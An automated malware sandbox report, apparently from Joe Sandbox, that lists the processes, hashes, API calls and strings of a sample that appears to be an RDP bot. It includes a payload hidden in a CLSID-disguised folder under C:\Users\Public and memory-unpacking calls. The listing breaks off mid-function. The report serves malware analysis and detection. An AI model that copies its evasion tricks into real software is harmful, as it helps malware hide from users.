Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:10:15
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:11:05
Start date:	01/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	12:11:05
Start date:	01/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Imagebase:	0x7ff7ddc90000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:11:05
Start date:	01/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
Imagebase:	0x7ff7ddc90000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:11:27
Start date:	01/01/2025
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff76a900000
File size:	89'088 bytes
MD5 hash:	BB070CFBD23A7BC6F2A0F8F6D167D207
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 02989CF6 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298A053
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298A059
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298A05F

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
Instruction ID: 774a5e79b1c93baf47db36c9bad5ad7db5838a35b77f5bed1b9626aaea72411a
Opcode Fuzzy Hash: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
Instruction Fuzzy Hash: AFB17E71918A4C8FDB54EF28C884AAEB7E1FFE9314F64571AE489D3251DB709481CB81

Function 0298CDA6 Relevance: 3.3, APIs: 2, Instructions: 338COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298D0EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0298D0F1

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
Instruction ID: fe883d202fde595aa8116f169b9545712ef1afe7919f3d3536881ee0ac293cb7
Opcode Fuzzy Hash: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
Instruction Fuzzy Hash: C5A16D31928B4C8BDB54EF28D885AEEB7E2FBD9310F54571AE48AC3155DB30A581CB81

Function 02984B4A Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
Instruction ID: b62c27f421d637907f320aae50af6f7b0cdc4461f263793091ea2e626029fd4a
Opcode Fuzzy Hash: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
Instruction Fuzzy Hash: BAA1C231618E0D8FCB58FF28D485AADB7E6FFA9314F04561AE44AD7150EA30E981CB85

Function 0299D122 Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 0299D371

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
Instruction ID: 74b12c2661908b0fec1d4220fc6d39e2aa3d0b339b83089ec48a8a0ac637ec86
Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
Instruction Fuzzy Hash: C5B16A31510A4D8FDF98EF1CC88AB6677E0FB59328F198599E859CB2A1C335E852CB11

Function 02987F2E Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
Instruction ID: 6f36d9f65b3d703e2e263f8998cd2d1b3104c1856ef679ebcf2c2d9cdbe2a1ff
Opcode Fuzzy Hash: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
Instruction Fuzzy Hash: 7AE16031918B8C8BC745EF68C8946BAB3E1FFE9300F545B1EE486D3155EB74A644CB81

Function 0299701E Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
Instruction ID: 660f31c40a7c5749aeded24e9203fa8e38276df16c924c5b1b65eb91db51dc74
Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
Instruction Fuzzy Hash: F061F97092CB5C4FDF28EF6C98491BAB7D5FB95720F10465FE486C3155DE70A8418AC2

Function 029953EA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
Instruction ID: cd743210a64f267337a752a3d9cf48edec25297c7903c85d8e962c1afbdf14d7
Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
Instruction Fuzzy Hash: 0F51F232718E0C8F9B1CEF6CD89867673D2E7ED325315822EE40ED7265DA70D8868781

Function 029860CE Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction ID: 4ce6d28c10429e396da7463bc38c77a9bb9dada0a84e9f14ee591451a85ac8c6
Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction Fuzzy Hash: CB218331B126054BE70CCE2EC89A575B3D6F7D9209B58C67DE15BCB397CA3668038A08

Function 02985B3E Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction ID: 64865600b282af6116579572cd660b1e5abe3314f59ac25db91dd4c492d78460
Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction Fuzzy Hash: CF11CE722108008FD75CDE3DCD8A67933D6EB99204B49C2BCE51ACB26ADA358406C644

Function 02990D62 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02990DBF

Part of subcall function 02993122: __GetUnwindTryBlock.LIBCMT ref: 02993165
Part of subcall function 02993122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0299318A

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02990E97
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 029910E5
std::bad_alloc::bad_alloc.LIBCMT ref: 029911F2

Strings

csm, xrefs: 02990E40
csm, xrefs: 02990DD9
csm, xrefs: 02990EBA

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
Instruction ID: 3eac2770341ae6d48f8e6e10f60406895107c42440b6e244f763027414b1a86d
Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
Instruction Fuzzy Hash: 30E1BF30918B498FDF24EF6CC4856AD77E5FB99324F54065EE88AD7211DB34E881CB82

Function 02991232 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 029913D0
std::bad_alloc::bad_alloc.LIBCMT ref: 029916F9

Strings

csm, xrefs: 02991379
csm, xrefs: 02991317
csm, xrefs: 029913F7

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
Instruction ID: 548c425777b1743302ca1c1c5c4e6aff300d513e9acb432d26925ee56a75b831
Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
Instruction Fuzzy Hash: E4E1D330918B498FDF14EF6CC4856AD7BE5FB99324F14066ED49A87652DB30E482CF82

Function 02990632 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 02990755
__AdjustPointer.LIBCMT ref: 029907A0

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
Instruction ID: d9613274982a34ff98076ddd51d2bbe769d68ced00bf5aa6baeaf04f54af1731
Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
Instruction Fuzzy Hash: ACC1E030218E4A8F9F29AF2CC454275B2D5FF94334B584A6EC8AAC3255EB71D8818BC1

Function 0298A412 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

, xrefs: 0298A672
2, xrefs: 0298A667
`, xrefs: 0298A4B3
H, xrefs: 0298A6B0
P!`, xrefs: 0298A71A
(, xrefs: 0298A6C6

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID:
String ID: $($2$H$P!`$`
API String ID: 0-2682688576
Opcode ID: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
Instruction ID: 844d49b1a20257b392fb37ec2a87597992a5076e05cd073ed8f1bf762b586e7a
Opcode Fuzzy Hash: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
Instruction Fuzzy Hash: 65C104B09187988FD7A4EF18C08879ABBE1FB99304F504A6ED8CDCB215DB705589CF46

Function 029919A6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02991A61

Strings

RCC, xrefs: 02991A32
MOC, xrefs: 02991A2A

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
Instruction ID: a46cf7ee58ddc4d0a26d582136cae46782f73927870a00b25da0e651f91c16fd
Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
Instruction Fuzzy Hash: E9A1C130918B498FDF19EF2CC485AADBBE1FB98314F14465EE489C7161EB34E581CB81

Function 0299006A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02990095
_IsNonwritableInCurrentImage.LIBCMT ref: 0299012C

Strings

csm, xrefs: 02990113

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
Instruction ID: 78989ba26d9f17cb6053c1975abfeda5f2329f478d2e3e2c3836709c9bbf3bd7
Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
Instruction Fuzzy Hash: D961C23060CA098BCF28EE5CD885B7873D5FB94365F10456DE8AAC7256EB70E8918B85

Function 02991736 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 029917E1

Strings

RCC, xrefs: 029917B1
MOC, xrefs: 029917A9

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
Instruction ID: 57da9d4770d3f2cfeab47a3b6a52c5ad337f51a387a7520c3d03d92114b98a24
Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
Instruction Fuzzy Hash: 2171AD30518B498FDB28EF1CD446BAAB7E0FB99324F444A5EE48DC3211DB74A581CB82

Function 029927F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 029928A0
_CreateFrameInfo.LIBVCRUNTIME ref: 029928C9

Strings

csm, xrefs: 029929C9

Memory Dump Source

Source File: 00000000.00000002.1655751739.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_DF2.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction ID: 5e052accb03517d18700416a81b7e33464baba83de8f503700114eb36221f2ce
Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction Fuzzy Hash: 4C5153B0518B449FDB64EF2CC48566E7BE1FB99361F50056EE489C7621DB30E842CF86

Analysis Process: DF2.exePID: 6696, Parent PID: 552COMMON

Execution Graph

Execution Coverage:	59.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02AF01B0 Relevance: 9.3, APIs: 6, Instructions: 317
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02AF0215
VirtualProtect.KERNELBASE ref: 02AF0301
VirtualFree.KERNELBASE ref: 02AF0332
VirtualFree.KERNELBASE ref: 02AF0358
VirtualAlloc.KERNELBASE ref: 02AF037B
VirtualProtect.KERNELBASE ref: 02AF051B

Memory Dump Source

Source File: 00000001.00000002.2912148615.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_DF2.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction ID: f895256879b598974e8aef7cf7ee84026d8aaaefe7cf916f914f450ee4aa7b4b
Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction Fuzzy Hash: A9C1DA7021CA488FD784EF5CC498B6AB7E1FB98305F51485DF58AC7265DBB8E881CB06

Function 02AF0620 Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02AF063A

Memory Dump Source

Source File: 00000001.00000002.2912148615.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_DF2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

Analysis Process: w8m7wmyk939oczmkw4o2h16hs.exePID: 3068, Parent PID: 6696COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10%
Total number of Nodes:	1703
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF764CC45D5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF764CC461A
fseek.MSVCRT ref: 00007FF764CC4639
_errno.MSVCRT ref: 00007FF764CC464D
_errno.MSVCRT ref: 00007FF764CC4668
_errno.MSVCRT ref: 00007FF764CC4727

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

_errno.MSVCRT ref: 00007FF764CC4742
_errno.MSVCRT ref: 00007FF764CC478F
fclose.MSVCRT ref: 00007FF764CC4B30

Strings

[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF764CC4736
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC46A4, 00007FF764CC46D7, 00007FF764CC470A
(path != NULL), xrefs: 00007FF764CC4696
fs_file_read, xrefs: 00007FF764CC4655, 00007FF764CC469D, 00007FF764CC46D0, 00007FF764CC4703, 00007FF764CC472F, 00007FF764CC483A, 00007FF764CC4950, 00007FF764CC4A1B, 00007FF764CC4ADA, 00007FF764CC4B65, 00007FF764CC4BA8
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF764CC4AE1
NULL, xrefs: 00007FF764CC4B99
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF764CC46FC
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF764CC4841
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC468F, 00007FF764CC46C2, 00007FF764CC46F5
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF764CC4957
(buf_sz != NULL), xrefs: 00007FF764CC46C9
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF764CC4A22
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF764CC465C
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF764CC49FB
mem_alloc, xrefs: 00007FF764CC49F4
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF764CC4BAF

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: 56bda5fc60cecd46d586682a57799ceafb1f751f604598006fcc980bed072e31
Instruction ID: 3b8bc53e928c01586d10e767895f95467ae5535e2d6e856df3ad58f0bf043364
Opcode Fuzzy Hash: 56bda5fc60cecd46d586682a57799ceafb1f751f604598006fcc980bed072e31
Instruction Fuzzy Hash: D2D16B21A08A07D1FA20BF57E8C07B8A761AF50785FD5A133D90D577A4EE3CE446CB24

Function 00007FF764CC855D Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 393COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF764CC9BB9: strcmp.MSVCRT ref: 00007FF764CC9CAD

Process32Next.KERNEL32 ref: 00007FF764CC8671
GetLastError.KERNEL32 ref: 00007FF764CC867D
GetLastError.KERNEL32 ref: 00007FF764CC86C1
GetLastError.KERNEL32 ref: 00007FF764CC87A3
OpenProcess.KERNEL32 ref: 00007FF764CC88DC
QueryFullProcessImageNameW.KERNEL32 ref: 00007FF764CC8920
GetLastError.KERNEL32 ref: 00007FF764CC892E
CloseHandle.KERNEL32 ref: 00007FF764CC8CA8

Strings

block_app, xrefs: 00007FF764CC868D, 00007FF764CC86CC, 00007FF764CC87B7, 00007FF764CC8939, 00007FF764CC8A2B, 00007FF764CC8A88
app, xrefs: 00007FF764CC858D
[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu), xrefs: 00007FF764CC8A8F
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF764CC87BE
[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d), xrefs: 00007FF764CC8A32
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF764CC8694
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF764CC86D3
[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu), xrefs: 00007FF764CC8940

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
API String ID: 1025937399-1899507746
Opcode ID: 7feaebe1669a70a124df80b49270637b6d608be3fa014889acb4301ea10ee1e4
Instruction ID: 6a31fdc9aac01762394c6c6de380470028e22818c535c0449c52af66da06dbc3
Opcode Fuzzy Hash: 7feaebe1669a70a124df80b49270637b6d608be3fa014889acb4301ea10ee1e4
Instruction Fuzzy Hash: 73F12661F0C603C2FB706F16A4D0BBE9250AF49756FE02433C60E477D5DE6DA8859A3A

Function 00007FF764CC1131 Relevance: 13.6, APIs: 9, Instructions: 120
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF764CC1313), ref: 00007FF764CC116E
_amsg_exit.MSVCRT(?,?,?,00007FF764CC1313), ref: 00007FF764CC118D
